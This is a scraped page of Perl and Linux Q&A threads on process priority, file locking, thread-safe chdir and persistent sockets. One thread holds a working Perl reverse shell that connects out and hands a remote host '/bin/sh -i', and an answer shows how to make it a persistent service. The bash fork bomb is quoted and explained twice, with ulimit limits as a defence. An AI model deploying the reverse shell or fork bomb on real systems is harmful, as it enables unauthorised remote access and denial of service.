Runnig OS functions with modified scheduling priority in Perl - linux

Is it possible to have Perl run a Linux OS function with a modified scheduling and/or IO scheduling priority without external commands? I am trying to simulate the following:
nice -n19 ionice -c2 -n7 cp largefile largefile2
Can I somehow do this with File::Copy, the setpriority function, and the CPAN module Linux::IO_Prio? Would I just need to lower the scheduling priority of $0?
EDIT:
If I do the following will the priority and IO be lowered for copy()? Is there a better way to do this?
use Linux::IO_Prio qw(:all);
use File::Copy;
setpriority(0, 0, -20);
ionice(IOPRIO_WHO_PROCESS, $$, IOPRIO_CLASS_IDLE, 7);
copy("file1","file2") or die "Copy failed: $!";

Refining Oesor’s answer:
use BSD::Resource qw(PRIO_PROCESS setpriority);
use Linux::IO_Prio qw(IOPRIO_WHO_PROCESS IOPRIO_PRIO_VALUE IOPRIO_CLASS_BE ioprio_set);
BEGIN { require autodie::hints; autodie::hints->set_hints_for(\&ioprio_set, { fail => sub { $_[0] == -1 } } ) };
use autodie qw(:all setpriority ioprio_set);
setpriority(
PRIO_PROCESS, # 1
$$,
19
);
ioprio_set(
IOPRIO_WHO_PROCESS, # 1
$$,
IOPRIO_PRIO_VALUE(IOPRIO_CLASS_BE, 7) # 0x4007
);
By the way, you can find out library call and similar stuff with strace.

You're probably best off simply changing the priority of the currently running pid as needed. Not portable, of course, but doing this is in and of itself non-portable. Anything performing this sort of thing is going to boil down to making the same library calls the external commands do.
my $pid = $$;
`ionice -c2 -p$pid`;
`renice +19 $pid`;

Related

how can i create persistent socket connection on perl?

I'm learning Perl and I have two Linux systems (server/client). I want to connect them via Perl with a reverse socket connection.
The way I do it is with this command on the server side:
perl -e 'use Socket;
$i="**iphere**";
$p=**porthere**;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};'
This works fine, but I want to make it persistent on time. Maybe executing some delayed script.
The server system is CentOS.
Any idea?
Well, step one would be to take your command-line script and turn it into a real program. Put it in a file called my_server and reformat it like this (to make it easier to maintain).
use Socket;
$i = "**iphere**";
$p = **porthere**;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if (connect(S, sockaddr_in($p, inet_aton($i)))) {
open(STDIN, ">&S");
open(STDOUT, ">&S");
open(STDERR, ">&S");
exec("/bin/sh -i");
}
You can now run that by typing perl my_server at the command line. We can make it look more like a command by adding a shebang line and making it executable. At this point I'm also going to add Perl's safety nets, use strict and use warnings (which you should always have in your Perl code), and they will require us to define our variables with my.
#!/usr/bin/env perl
use strict;
use warnings;
use Socket;
my $i = "**iphere**";
my $p = **porthere**;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if (connect(S, sockaddr_in($p, inet_aton($i)))) {
open(STDIN, ">&S");
open(STDOUT, ">&S");
open(STDERR, ">&S");
exec("/bin/sh -i");
}
If we now make that executable (chmod +x my_server), we can now run it by just typing the program's name (my_server) on the command line.
The next step would be to make it into a proper service which you can start, stop and monitor using your OS's native service capabilities. I don't have time to get into that in detail, but I'd be looking at Daemon::Control.
You're kinda using Old school, C like of socket programming in perl which is good but remember it's Perl. To make it more readable and simple, you can always use IO::Socket. Which improves code readability and reduces code complexity. Also in production environment, I would recommend you to add server IP's in /etc/hosts and use the host name instead of IP.

Unknown bash command causing PC to freeze [duplicate]

I looked at this page and can't understand how this works.
This command "exponentially spawns subprocesses until your box locks up".
But why? What I understand less are the colons.
user#host$ :(){ :|:& };:
:(){ :|:& };:
..defines a function named :, which spawns itself (twice, one pipes into the other), and backgrounds itself.
With line breaks:
:()
{
:|:&
};
:
Renaming the : function to forkbomb:
forkbomb()
{
forkbomb | forkbomb &
};
forkbomb
You can prevent such attacks by using ulimit to limit the number of processes-per-user:
$ ulimit -u 50
$ :(){ :|:& };:
-bash: fork: Resource temporarily unavailable
$
More permanently, you can use /etc/security/limits.conf (on Debian and others, at least), for example:
* hard nproc 50
Of course that means you can only run 50 processes, you may want to increase this depending on what the machine is doing!
That defines a function called : which calls itself twice (Code: : | :). It does that in the background (&). After the ; the function definition is done and the function : gets started.
So every instance of : starts two new : and so on... Like a binary tree of processes...
Written in plain C that is:
fork();
fork();
Just to add to the above answers, the behavior of pipe | is to create two processes at once and connect them with pipe(pipe is implemented by the operating system itself), so when we use pipe, each parent processes spawn two other processes, which leads to utilization of system resource exponentially so that resource is used up faster. Also & is used to background the process and in this case prompts returns immediately so that the next call executes even faster.
Conclusion :
|: To use system resource faster( with exponential growth)
&: background the process to get process started faster
This defines a function called : (:()). Inside the function ({...}), there's a :|:& which is like this:
: calls this : function again.
| signifies piping the output to a command.
: after | means pipe to the function :.
&, in this case, means run the preceding in the background.
Then there's a ; that is known as a command separator.
Finally, the : starts this "chain reaction", activating the fork bomb.
The C equivalent would be:
#include <sys/types.h>
#include <unistd.h>
int main()
{
fork();
fork();
}

Why is File::FcntlLock's l_type always "F_UNLCK" even if the file is locked?

The Perl subroutine below uses File::FcntlLock to check if a file is locked.
Why does it return 0 and print /tmp/test.pid is unlocked. even if the file is locked?
sub getPidOwningLock {
my $filename = shift;
my $fs = new File::FcntlLock;
$fs->l_type( F_WRLCK );
$fs->l_whence( SEEK_SET );
$fs->l_start( 0 );
$fs->l_len( 0 );
my $fd;
if (!open($fd, '+<', $filename)) {
print "Could not open $filename\n";
return -1;
}
if (!$fs->lock($fd, F_GETLK)) {
print "Could not get lock information on $filename, error: $fs->error\n";
close($fd);
return -1;
}
close($fd);
if ($fs->l_type() == F_UNLCK) {
print "$filename is unlocked.\n";
return 0;
}
return $fs->l_pid();
}
The file is locked as follows (lock.sh):
#!/bin/sh
(
flock -n 200
while true; do sleep 1; done
) 200>/tmp/test.pid
The file is indeed locked:
~$ ./lock.sh &
[2] 16803
~$ lsof /tmp/test.pid
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 26002 admin 200w REG 8,5 0 584649 test.pid
sleep 26432 admin 200w REG 8,5 0 584649 test.pid
fcntl and flock locks are invisible to each other.
This is a big problem for your use case because the flock utility that you're using in your shell script depends on flock semantics: the shell script runs a flock child process, which locks an inherited file descriptor and then exits. The shell keeps that file descriptor open (because the redirection is on a whole sequence of commands) until it wants to release the lock.
That plan can't work with fcntl because fcntl locks are not shared among processes. If there was a utility identical to flock but using fcntl, the lock would be released too early (as soon as the child process exits).
For coordination of a file lock between a perl process and a shell script, some options you can consider are:
port the shell script to zsh and use the zsystem flock builtin from the zsh/system module (note: in the documentation it claims to use fcntl in spite of its name being flock)
rewrite the shell script in perl
just use flock in the perl script (give up byte range locking and the "get locker PID" feature - but you can emulate that on Linux by reading /proc/locks)
write your own fcntl utility in C for use in the shell script (the usage pattern will be different - the shell script will have to background it and then kill it later to unlock - and it will need some way to tell the parent process when it has obtained or failed to obtain the lock, which will be hard because it's happening asynchronously now... maybe use the coprocess feature that some shells have).
run a small perl script from the shell script to do the locking (will need the same background treatment that a dedicated fcntl utility would need)
For more information on features of the different kinds of locks, see What is the difference between locking with fcntl and flock.

How can I change the current directory in a thread-safe manner in Perl?

I'm using Thread::Pool::Simple to create a few working threads. Each working thread does some stuff, including a call to chdir followed by an execution of an external Perl script (from the jbrowse genome browser, if it matters). I use capturex to call the external script and die on its failure.
I discovered that when I use more then one thread, things start to be messy. after some research. it seems that the current directory of some threads is not the correct one.
Perhaps chdir propagates between threads (i.e. isn't thread-safe)?
Or perhaps it's something with capturex?
So, how can I safely set the working directory for each thread?
** UPDATE **
Following the suggestions to change dir while executing, I'd like to ask how exactly should I pass these two commands to capturex?
currently I have:
my #args = ( "bin/flatfile-to-json.pl", "--gff=$gff_file", "--tracklabel=$track_label", "--key=$key", #optional_args );
capturex( [0], #args );
How do I add another command to #args?
Will capturex continue die on errors of any of the commands?
I think that you can solve your "how do I chdir in the child before running the command" problem pretty easily by abandoning IPC::System::Simple as not the right tool for the job.
Instead of doing
my $output = capturex($cmd, #args);
do something like:
use autodie qw(open close);
my $pid = open my $fh, '-|';
unless ($pid) { # this is the child
chdir($wherever);
exec($cmd, #args) or exit 255;
}
my $output = do { local $/; <$fh> };
# If child exited with error or couldn't be run, the exception will
# be raised here (via autodie; feel free to replace it with
# your own handling)
close ($fh);
If you were getting a list of lines instead of scalar output from capturex, the only thing that needs to change is the second-to-last line (to my #output = <$fh>;).
More info on forking-open is in perldoc perlipc.
The good thing about this in preference to capture("chdir wherever ; $cmd #args") is that it doesn't give the shell a chance to do bad things to your #args.
Updated code (doesn't capture output)
my $pid = fork;
die "Couldn't fork: $!" unless defined $pid;
unless ($pid) { # this is the child
chdir($wherever);
open STDOUT, ">/dev/null"; # optional: silence subprocess output
open STDERR, ">/dev/null"; # even more optional
exec($cmd, #args) or exit 255;
}
wait;
die "Child error $?" if $?;
I don't think "current working directory" is a per-thread property. I'd expect it to be a property of the process.
It's not clear exactly why you need to use chdir at all though. Can you not launch the external script setting the new process's working directory appropriately instead? That sounds like a more feasible approach.

The Bash command :(){ :|:& };: will spawn processes to kernel death. Can you explain the syntax?

I looked at this page and can't understand how this works.
This command "exponentially spawns subprocesses until your box locks up".
But why? What I understand less are the colons.
user#host$ :(){ :|:& };:
:(){ :|:& };:
..defines a function named :, which spawns itself (twice, one pipes into the other), and backgrounds itself.
With line breaks:
:()
{
:|:&
};
:
Renaming the : function to forkbomb:
forkbomb()
{
forkbomb | forkbomb &
};
forkbomb
You can prevent such attacks by using ulimit to limit the number of processes-per-user:
$ ulimit -u 50
$ :(){ :|:& };:
-bash: fork: Resource temporarily unavailable
$
More permanently, you can use /etc/security/limits.conf (on Debian and others, at least), for example:
* hard nproc 50
Of course that means you can only run 50 processes, you may want to increase this depending on what the machine is doing!
That defines a function called : which calls itself twice (Code: : | :). It does that in the background (&). After the ; the function definition is done and the function : gets started.
So every instance of : starts two new : and so on... Like a binary tree of processes...
Written in plain C that is:
fork();
fork();
Just to add to the above answers, the behavior of pipe | is to create two processes at once and connect them with pipe(pipe is implemented by the operating system itself), so when we use pipe, each parent processes spawn two other processes, which leads to utilization of system resource exponentially so that resource is used up faster. Also & is used to background the process and in this case prompts returns immediately so that the next call executes even faster.
Conclusion :
|: To use system resource faster( with exponential growth)
&: background the process to get process started faster
This defines a function called : (:()). Inside the function ({...}), there's a :|:& which is like this:
: calls this : function again.
| signifies piping the output to a command.
: after | means pipe to the function :.
&, in this case, means run the preceding in the background.
Then there's a ; that is known as a command separator.
Finally, the : starts this "chain reaction", activating the fork bomb.
The C equivalent would be:
#include <sys/types.h>
#include <unistd.h>
int main()
{
fork();
fork();
}

Resources